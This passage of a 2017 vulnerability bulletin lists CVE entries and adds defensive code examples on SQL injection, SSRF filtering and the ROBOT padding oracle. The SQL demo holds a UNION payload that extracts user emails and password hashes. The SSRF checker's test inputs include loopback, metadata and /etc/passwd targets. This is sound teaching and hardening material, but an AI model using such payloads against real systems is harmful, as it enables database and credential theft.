In EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, 8.0.0.0 - 8.0.0.4, 7.2.1.0 - 7.2.1.5, 7.2.0.x, and 7.1.1.x, a malicious compliance admin (compadmin) account user could exploit a vulnerability in isi_get_itrace or isi_get_profile maintenance scripts to run any shell script as system root on a cluster in compliance mode. This could potentially lead to an elevation of privilege for the compadmin user and violate compliance mode.2017-12-13not yet calculatedCVE-2017-14380
CONFIRM
erlang -- erlang
 
The Erlang otp TLS server answers with different TLS alerts to different error types in the RSA PKCS #1 1.5 padding. This allows an attacker to decrypt content or sign messages with the server's private key (this is a variation of the Bleichenbacher attack).2017-12-12not yet calculatedCVE-2017-1000385
MLIST
MLIST
MLIST
BID
MISC
DEBIAN
CERT-VN
exiv2 -- exiv2
 
There is a heap-based buffer over-read in the Exiv2::Internal::PngChunk::keyTXTChunk function of pngchunk_int.cpp in Exiv2 0.26. A crafted PNG file will lead to a remote denial of service attack.2017-12-13not yet calculatedCVE-2017-17669
MISC
ffmpeg -- libswresample
 
The swri_audio_convert function in audioconvert.c in FFmpeg libswresample through 3.0.101, as used in FFmpeg 3.4.1, aubio 0.4.6, and other products, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted audio file.2017-12-11not yet calculatedCVE-2017-17555
MISC
flash_seats -- flash_seats_mobile_app_for_android
 
Flash Seats Mobile App for Android version 1.7.9 and earlier and for iOS version 1.9.51 and earlier fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3190
BID
CERT-VN
MISC
flippa-clone.com -- website_auction_marketplace
 
Website Auction Marketplace 2.0.5 has SQL Injection via the search.php cat_id parameter.2017-12-13not yet calculatedCVE-2017-17592
MISC
fontforge -- fontforge
 
uiutil.c in FontForge through 20170731 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17534.2017-12-14not yet calculatedCVE-2017-17521
MISC
fortinet -- forticlient_fortios
 
An Information Disclosure vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.5, 5.2 and below versions allow an admin user with super_admin privileges to view the current SSL VPN web portal session info which may contains user credentials through the fnsysctl CLI command.2017-12-13not yet calculatedCVE-2017-7738
BID
CONFIRM
fortinet -- forticlient_windows
 
A privilege escalation in Fortinet FortiClient Windows 5.4.3 and earlier as well as 5.6.0 allows attacker to gain privilege via exploiting the Windows "security alert" dialog thereby popping up when the "VPN before logon" feature is enabled and an untrusted certificate chain.2017-12-14not yet calculatedCVE-2017-7344
BID
CONFIRM
fortinet -- forticlient
 
An Information Disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations.2017-12-15not yet calculatedCVE-2017-14184
BID
CONFIRM
fortunescripts.com -- N/A
 
Basic Job Site Script 2.0.5 has SQL Injection via the keyword parameter to /job.2017-12-13not yet calculatedCVE-2017-17642
MISC
fs -- amazon_clone
 
FS Amazon Clone 1.0 has SQL Injection via the PATH_INFO to /VerAyari.2017-12-13not yet calculatedCVE-2017-17572
MISC
fs -- care_clone
 
FS Care Clone 1.0 has SQL Injection via the searchJob.php jobType or jobFrequency parameter.2017-12-13not yet calculatedCVE-2017-17574
MISC
fs -- crowdfunding_clone
 
FS Crowdfunding Script 1.0 has SQL Injection via the latest_news_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17578
MISC
fs -- expedia_clone
 
FS Expedia Clone 1.0 has SQL Injection via the pages.php or content.php id parameter, or the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17570
MISC
fs -- ebay_clone
 
FS Ebay Clone 1.0 has SQL Injection via the product.php id parameter, or the search.php category_id or sub_category_id parameter.2017-12-13not yet calculatedCVE-2017-17573
MISC
fs -- foodpanda_clone
 
FS Foodpanda Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17571
MISC
fs -- freelancer_clone
 
FS Freelancer Clone 1.0 has SQL Injection via the profile.php u parameter.2017-12-13not yet calculatedCVE-2017-17579
MISC
fs -- gigs_clone
 
FS Gigs Script 1.0 has SQL Injection via the browse-category.php cat parameter, browse-scategory.php sc parameter, or service-provider.php ser parameter.2017-12-13not yet calculatedCVE-2017-17576
MISC
fs -- groupon_clone
 
FS Groupon Clone 1.0 has SQL Injection via the item_details.php id parameter or the vendor_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17575
MISC
fs -- grubhub_clone
 
FS Grubhub Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17582
MISC
fs -- imdb_clone
 
FS IMDB Clone 1.0 has SQL Injection via the movie.php f parameter, tvshow.php s parameter, or show_misc_video.php id parameter.2017-12-13not yet calculatedCVE-2017-17588
MISC
fs -- indiamart_clone
 
FS Indiamart Clone 1.0 has SQL Injection via the catcompany.php token parameter, buyleads-details.php id parameter, or company/index.php c parameter.2017-12-13not yet calculatedCVE-2017-17587
MISC
fs -- linkedin_clone
 
FS Linkedin Clone 1.0 has SQL Injection via the group.php grid parameter, profile.php fid parameter, or company_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17580
MISC
fs -- makemytrip_clone
 
FS Makemytrip Clone 1.0 has SQL Injection via the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17584
MISC
fs -- monster_clone
 
FS Monster Clone 1.0 has SQL Injection via the Employer_Details.php id parameter.2017-12-13not yet calculatedCVE-2017-17585
MISC
fs -- olx_clone
 
FS Olx Clone 1.0 has SQL Injection via the subpage.php scat parameter or the message.php pid parameter.2017-12-13not yet calculatedCVE-2017-17586
MISC
fs -- quibids_clone
 
FS Quibids Clone 1.0 has SQL Injection via the itechd.php productid parameter.2017-12-13not yet calculatedCVE-2017-17581
MISC
fs -- shutterstock_clone
 
FS Shutterstock Clone 1.0 has SQL Injection via the /Category keywords parameter.2017-12-13not yet calculatedCVE-2017-17583
MISC
fs -- stackoverflow_clone
 
FS Stackoverflow Clone 1.0 has SQL Injection via the /question keywords parameter.2017-12-13not yet calculatedCVE-2017-17590
MISC
fs -- thumbtack_clone
 
FS Thumbtack Clone 1.0 has SQL Injection via the browse-category.php cat parameter or the browse-scategory.php sc parameter.2017-12-13not yet calculatedCVE-2017-17589
MISC
fs -- trademe_clone
 
FS Trademe Clone 1.0 has SQL Injection via the search_item.php search parameter or the general_item_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17577
MISC
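The FS clone entries above all describe one defect class: a request parameter such as id, cat or keywords pasted into a SQL string. As an added illustration (not code from any of these scripts), the following Python reproduces that pattern against an in-memory SQLite table with constructed rows, shows what a UNION payload in the id parameter returns, and gives the parameterized form that closes it. The table and column names and the products/users split are assumptions for the demo, chosen to mirror a product.php?id= lookup.

```python
import sqlite3

# Constructed sample schema for the demo: a product table the page is meant
# to query, plus a table the request should never be able to reach.
# Table and column names are assumptions, not those of any FS script.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT);
INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
INSERT INTO users VALUES (1, 'admin@example.test', 'sha256$deadbeef');
"""

# A UNION payload of the kind sent in a numeric id parameter: the leading 0
# matches no product, so the rows that come back are entirely attacker-chosen.
PAYLOAD = "0 UNION SELECT id, email, pw_hash FROM users"


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def product_lookup_vulnerable(conn: sqlite3.Connection, product_id: str) -> list:
    """The shape behind the bulletin entries: the raw request parameter is
    string-concatenated into the statement, so it is parsed as SQL."""
    sql = "SELECT id, name, price FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def product_lookup_fixed(conn: sqlite3.Connection, product_id: str) -> list:
    """Same query with the value bound as a parameter. The bind alone keeps
    the input out of the SQL grammar; the isdigit() check additionally
    rejects junk early with a clear error instead of an empty result."""
    if not product_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (int(product_id),)
    ).fetchall()


def fixed_rejects(conn: sqlite3.Connection, product_id: str) -> bool:
    """True when the hardened lookup refuses the input outright."""
    try:
        product_lookup_fixed(conn, product_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    print("legit   :", product_lookup_vulnerable(db, "1"))
    print("injected:", product_lookup_vulnerable(db, PAYLOAD))
    print("fixed   :", product_lookup_fixed(db, "1"), "| payload rejected:",
          fixed_rejects(db, PAYLOAD))
```

The same bind-not-concatenate rule applies to string parameters (keywords, search, fl_orig); with those the payload starts with a closing quote instead of a digit, but the parameterized query is unchanged.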
geomview -- geomview
 
common/help.c in Geomview 1.9.5 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17530
MISC
gnu_global -- gnu_global
 
gozilla.c in GNU GLOBAL 4.8.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17531
MISC
graphicsmagick -- graphicsmagick
 
ReadRGBImage in coders/rgb.c in GraphicsMagick 1.3.26 has a magick/import.c ImportRGBQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17500
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
WriteOnePNGImage in coders/png.c in GraphicsMagick 1.3.26 has a heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17501
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadCMYKImage in coders/cmyk.c in GraphicsMagick 1.3.26 has a magick/import.c ImportCMYKQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17502
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadGRAYImage in coders/gray.c in GraphicsMagick 1.3.26 has a magick/import.c ImportGrayQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17503
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
WritePNMImage in coders/pnm.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (bit_stream.c MagickBitStreamMSBWrite heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file.2017-12-10not yet calculatedCVE-2017-17498
CONFIRM
BID
CONFIRM
harbor -- harbor
 
The Ping() function in ui/api/target.go in Harbor through 1.3.0-rc4 has SSRF via the endpoint parameter to /api/targets/ping.2017-12-15not yet calculatedCVE-2017-17697
MISC
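A ping endpoint that opens an outbound connection to a user-supplied URL is SSRF by construction unless the destination is constrained. The check below is an added example, not Harbor's code: it accepts only http(s) endpoints whose host is, or resolves exclusively to, public unicast addresses, with the resolver injectable so the check runs offline. The hostnames and addresses in the constructed resolver are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _is_public(addr) -> bool:
    """Reject every range a registry ping should never reach: RFC 1918,
    loopback, link-local (incl. 169.254.169.254 cloud metadata), multicast,
    reserved and unspecified. IPv4-mapped IPv6 is unwrapped first so
    [::ffff:10.0.0.1] cannot slip past the IPv4 rules."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def endpoint_is_allowed(endpoint: str, resolve=socket.gethostbyname_ex) -> bool:
    """Allow only http(s) URLs whose host is, or resolves exclusively to,
    public unicast addresses. `resolve` has the gethostbyname_ex signature
    and is injectable so the check can be exercised without DNS."""
    parts = urlsplit(endpoint)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False          # user:pass@host forms are a classic parser trick
    host = parts.hostname
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP, v4 or v6
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)[2]]
        except (socket.gaierror, ValueError, OSError):
            return False
    # every address must be public: a name with one private A record is enough
    # for a round-robin resolver to hand the client an internal target
    return bool(addrs) and all(_is_public(a) for a in addrs)


# Constructed resolver for offline use; names and addresses are assumptions.
_FAKE_DNS = {
    "registry.example": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "mixed.example": ["93.184.216.34", "10.0.0.5"],
}


def constructed_resolver(host: str):
    if host not in _FAKE_DNS:
        raise socket.gaierror(-2, "Name or service not known")
    return (host, [], list(_FAKE_DNS[host]))


if __name__ == "__main__":
    for url in ("https://registry.example/v2/", "http://metadata.internal/latest/",
                "http://mixed.example/", "http://127.0.0.1:8080/",
                "http://[::ffff:10.0.0.1]/", "file:///etc/passwd"):
        print(f"{url:40} -> {endpoint_is_allowed(url, constructed_resolver)}")
```

The resolution used for the check can differ from the one the HTTP client performs a moment later (DNS rebinding), so connect to the address that was vetted rather than re-resolving the name, and do not follow redirects without running the check again on the new location.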
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5T_conv_struct_opt in H5Tconv.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17507
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a NULL pointer dereference in the function H5O_pline_decode in the H5Opline.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17505
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5Opline_pline_decode in H5Opline.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17506
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds write vulnerability in the function H5G__ent_decode_vec in H5Gcache.c in libhdf5.a. For example, h5dump would crash or possibly have unspecified other impact when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17509
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a divide-by-zero vulnerability in the function H5T_set_loc in the H5T.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17508
MISC
huawei -- multiple_products
 
Huawei EC156, EC176, and EC177 USB Modem products with software before UTPS-V200R003B015D02SP07C1014 (23.015.02.07.1014) and before V200R003B015D02SP08C1014 (23.015.02.08.1014) use a weak ACL for the "Mobile Partner" directory, which allows remote attackers to gain SYSTEM privileges by compromising a low privilege account and modifying Mobile Partner.exe.2017-12-11not yet calculatedCVE-2014-8358
CONFIRM
BID
MISC
ibm -- connections_engagement_center
 
IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.2017-12-11not yet calculatedCVE-2017-1683
CONFIRM
BID
MISC
ibm -- connections
 
IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.2017-12-11not yet calculatedCVE-2017-1613
CONFIRM
BID
MISC
ibm -- doors_next_generation
 
IBM DOORS Next Generation (DNG/RRC) 4.07, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130915.2017-12-13not yet calculatedCVE-2017-1546
CONFIRM
BID
MISC
ibm -- financial_transaction_manager_for_multi-platform
 
IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926.2017-12-11not yet calculatedCVE-2017-1606
CONFIRM
BID
MISC
ibm -- inotes
 
IBM iNotes is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.2017-12-13not yet calculatedCVE-2017-1421
CONFIRM
BID
SECTRACK
MISC
ibm -- jazz_foundation_products
 
IBM Jazz Foundation Products could disclose sensitive information during a scan that could lead to further attacks against the system. IBM X-Force ID: 129619.2017-12-11not yet calculatedCVE-2017-1507
CONFIRM
MISC
ibm -- maximo_asset_management
 
IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.2017-12-13not yet calculatedCVE-2017-1558
CONFIRM
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow an authenticated user to change other user's passwords. IBM X-Force ID: 131290.2017-12-11not yet calculatedCVE-2017-1550
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289.2017-12-11not yet calculatedCVE-2017-1549
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288.2017-12-11not yet calculatedCVE-2017-1548
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133178.2017-12-11not yet calculatedCVE-2017-1632
CONFIRM
BID
MISC
ibm -- support_tools_for_lotus_wcm
 
IBM Support Tools for Lotus WCM (IBM WebSphere Portal 7.0, 8.0, 8.5 and 9.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130733.2017-12-11not yet calculatedCVE-2017-1536
CONFIRM
BID
MISC
ibm -- tivoli_monitoring
 
IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.2017-12-13not yet calculatedCVE-2017-1635
CONFIRM
BID
MISC
ibm -- tivoli_workload_scheduler
 
IBM Tivoli Workload Scheduler 8.6.0, 9.1.0, and 9.2.0 could disclose sensitive information to a local attacker due to improper permission settings. IBM X-Force ID: 134638.2017-12-13not yet calculatedCVE-2017-1716
CONFIRM
BID
MISC
ibm -- websphere_mq
 
IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow a local user to crash the queue manager agent thread and expose some sensitive information. IBM X-Force ID: 126454.2017-12-11not yet calculatedCVE-2017-1760
CONFIRM
MISC
icu -- international_components_for_unicode_for_c/c++
 
The ucnv_UTF8FromUTF8 function in ucnv_u8.cpp in International Components for Unicode (ICU) for C/C++ through 60.1 mishandles ucnv_convertEx calls for UTF-8 to UTF-8 conversion, which allows remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted string, as demonstrated by ZNC.2017-12-10not yet calculatedCVE-2017-17484
MISC
MISC
MISC
MISC
MISC
MISC
idevicerestore -- idevicerestore
 
The socket_create function in socket.c in idevicerestore through 2017-12-10 allows remote attackers to bypass intended access restrictions and communicate with services on iOS devices by connecting to an IPv4 TCP socket, a similar issue to CVE-2016-5104.2017-12-10not yet calculatedCVE-2017-17496
MISC
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a large loop vulnerability was found in the function ExtractPostscript in coders/wpg.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted wpg image file that triggers a ReadWPGImage call.2017-12-14not yet calculatedCVE-2017-17682
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 7.0.7-12 has a coders/png.c Magick_png_read_raw_profile heap-based buffer over-read via a crafted file, related to ReadOneMNGImage.2017-12-10not yet calculatedCVE-2017-17504
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted xpm image file.2017-12-14not yet calculatedCVE-2017-17680
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, an infinite loop vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted psd image file.2017-12-14not yet calculatedCVE-2017-17681
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 6.9.9-24 and 7.x before 7.0.7-12 has a use-after-free in Magick::Image::read in Magick++/lib/Image.cpp.2017-12-10not yet calculatedCVE-2017-17499
BID
CONFIRM
CONFIRM
CONFIRM
intel -- graphics_driver
 
Type Confusion in Content Protection HECI Service in Intel Graphics Driver allows unprivileged user to elevate privileges via local access.2017-12-12not yet calculatedCVE-2017-5717
CONFIRM
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17700
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17701
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17699
MISC
kaspersky -- embedded_systems_security
 
Kernel pool memory corruption in one of drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.2017-12-08not yet calculatedCVE-2017-12823
BID
CONFIRM
kildclient -- kildclient
 
KildClient 3.1.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to prefs.c and worldgui.c.2017-12-14not yet calculatedCVE-2017-17511
MISC
kiwi -- kiwi
 
examples/framework/news/news3.py in Kiwi 1.9.22 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17532
MISC
landesk -- management_suite
 
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted Direct Object Reference leads to referencing/updating objects belonging to other users. In other words, a normal user can send requests to a specific URI with the target user's username in an HTTP payload in order to retrieve a key/token and use it to access/update objects belonging to other users. Such objects could be user profiles, tickets, incidents, etc.2017-12-11not yet calculatedCVE-2017-11463
MISC
legion_of_the_bouncy_castle -- bouncycastle_tls
 
BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13098
CERT-VN
BID
CONFIRM
MISC
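ROBOT works because the server's handling of a malformed PKCS#1 v1.5 block is distinguishable from its handling of a well-formed one. The following is an added example, not BouncyCastle's code: it operates on the raw bytes that RSA decryption of a ClientKeyExchange yields (so no key is needed; the blocks are constructed), shows the textbook unpadding whose distinct errors form the oracle, and beside it the RFC 5246 section 7.4.7.1 shape that substitutes a random premaster on any failure without an early exit. The modulus size k = 128 and the TLS 1.2 client version bytes are assumptions; Python gives no timing guarantees, so the point is the control-flow structure, which the fixed Java code follows in the same way.

```python
import hmac
import os

PREMASTER_LEN = 48                # TLS RSA premaster secret is always 48 bytes
CLIENT_VERSION = b"\x03\x03"      # TLS 1.2, as the client would have offered


def unpad_oracle(block: bytes, client_version: bytes) -> bytes:
    """Textbook EME-PKCS1-v1_5 unpadding that raises on every malformation.
    Each distinct failure, and the different amount of work before it, is
    exactly the signal a Bleichenbacher/ROBOT attacker measures."""
    if len(block) < 11 or block[0] != 0x00 or block[1] != 0x02:
        raise ValueError("bad PKCS#1 header")
    sep = block.find(b"\x00", 2)
    if sep < 10:
        raise ValueError("padding string too short or no separator")
    pms = block[sep + 1:]
    if len(pms) != PREMASTER_LEN:
        raise ValueError("wrong premaster length")
    if pms[:2] != client_version:
        raise ValueError("version mismatch")
    return pms


def unpad_hardened(block: bytes, client_version: bytes, k: int) -> bytes:
    """RFC 5246 section 7.4.7.1 behaviour: pick a random premaster first,
    evaluate every condition without early exit, and select the real value
    only if all of them hold. The handshake then fails on the Finished MAC
    for every malformed ciphertext alike, so there is nothing to distinguish."""
    fake = os.urandom(PREMASTER_LEN)
    b = block.ljust(k, b"\x00")[:k]           # fixed length so indexing never raises
    sep_index = k - PREMASTER_LEN - 1         # separator must sit right before the pms
    ok = int(len(block) == k)
    ok &= int(b[0] == 0x00) & int(b[1] == 0x02)
    ok &= int(sep_index >= 10)                # at least 8 padding bytes
    ok &= int(b[sep_index] == 0x00)
    nonzero = 1
    for i in range(2, sep_index):             # scan all padding bytes, no break
        nonzero &= int(b[i] != 0)
    ok &= nonzero
    pms = b[k - PREMASTER_LEN:]
    ok &= int(hmac.compare_digest(pms[:2], client_version))
    mask = 0xFF * ok                           # 0xFF if valid, 0x00 otherwise
    return bytes((p & mask) | (f & (mask ^ 0xFF)) for p, f in zip(pms, fake))


def make_block(pms: bytes, k: int = 128) -> bytes:
    """Constructed test data: a well-formed padded block, i.e. what RSA
    decryption of a legitimate ClientKeyExchange yields (k = modulus bytes)."""
    ps = bytes(x or 0x01 for x in os.urandom(k - 3 - len(pms)))  # no zero bytes
    return b"\x00\x02" + ps + b"\x00" + pms


def oracle_error(block: bytes, client_version: bytes):
    """Message the oracle version leaks, or None if it accepts the block."""
    try:
        unpad_oracle(block, client_version)
    except ValueError as e:
        return str(e)
    return None


if __name__ == "__main__":
    pms = CLIENT_VERSION + os.urandom(46)
    good = make_block(pms)
    bad_header = b"\x00\x01" + good[2:]
    bad_short = b"\x00\x02" + b"\x01" * 5 + b"\x00" + b"\xaa" * (128 - 8)
    for name, blk in (("good", good), ("bad_header", bad_header), ("bad_short", bad_short)):
        print(f"{name:10} oracle: {oracle_error(blk, CLIENT_VERSION)!s:45} "
              f"hardened: 48 bytes, real={unpad_hardened(blk, CLIENT_VERSION, 128) == pms}")
```

Note that the hardened version also treats a version mismatch the same way as bad padding; reporting it separately reopens the oracle. Where possible, the stronger answer is to stop negotiating RSA key exchange suites altogether.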
lib/ecstatic.js -- lib/ecstatic.js
 
A regular expression Denial of Service (DoS) vulnerability in the file lib/ecstatic.js of the ecstatic npm package, before version 2.0.0, allows a remote attacker to overload and crash a server by passing a maliciously crafted string.2017-12-14not yet calculatedCVE-2016-10703
MISC
MISC
lilypond -- lilypond
 
lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17523
MISC
MISC
MISC
linux -- kernel
 
The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.2017-12-12not yet calculatedCVE-2017-17558
MISC
MISC
linux -- kernel
 
The raw_sendmsg() function in net/ipv4/raw.c in the Linux kernel through 4.14.6 has a race condition in inet->hdrincl that leads to uninitialized stack pointer usage; this allows a local user to execute code and gain privileges.2017-12-15not yet calculatedCVE-2017-17712
CONFIRM
CONFIRM
linux -- kernel
 
The Linux kernel 2.6.32 and later is affected by a denial of service: flooding the diagnostic port 0x80 can trigger an exception that leads to a kernel panic.2017-12-11not yet calculatedCVE-2017-1000407
MLIST
BID
CONFIRM
MLIST
maplesoft -- maple_t.a.
 
A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
mathias_kettner -- check_mk
 
A cross site scripting (XSS) vulnerability exists in Check_MK versions 1.2.8x prior to 1.2.8p25 and 1.4.0x prior to 1.4.0p9, allowing an unauthenticated attacker to inject arbitrary HTML or JavaScript via the output_format parameter, or via the username of a failed HTTP basic authentication attempt, which is echoed unencoded in an internal server error page.2017-12-11not yet calculatedCVE-2017-11507
CONFIRM
MISC
mckesson_medical_imaging_company -- conserus_image_repository_archive_solution
 
A security researcher found an XML External Entity (XXE) vulnerability on the Conserus Image Repository archive solution version 2.1.1.105 by McKesson Medical Imaging Company, which is now a Change Healthcare company. An unauthenticated user supplying a modified HTTP SOAP request to the vulnerable service allows for arbitrary file read access to the local file system as well as the transmittal of the application service's account hashed credentials to a remote attacker.2017-12-15not yet calculatedCVE-2017-14101
MISC
mckesson_medical_imaging_company -- conserus_workflow_intelligence_application
 
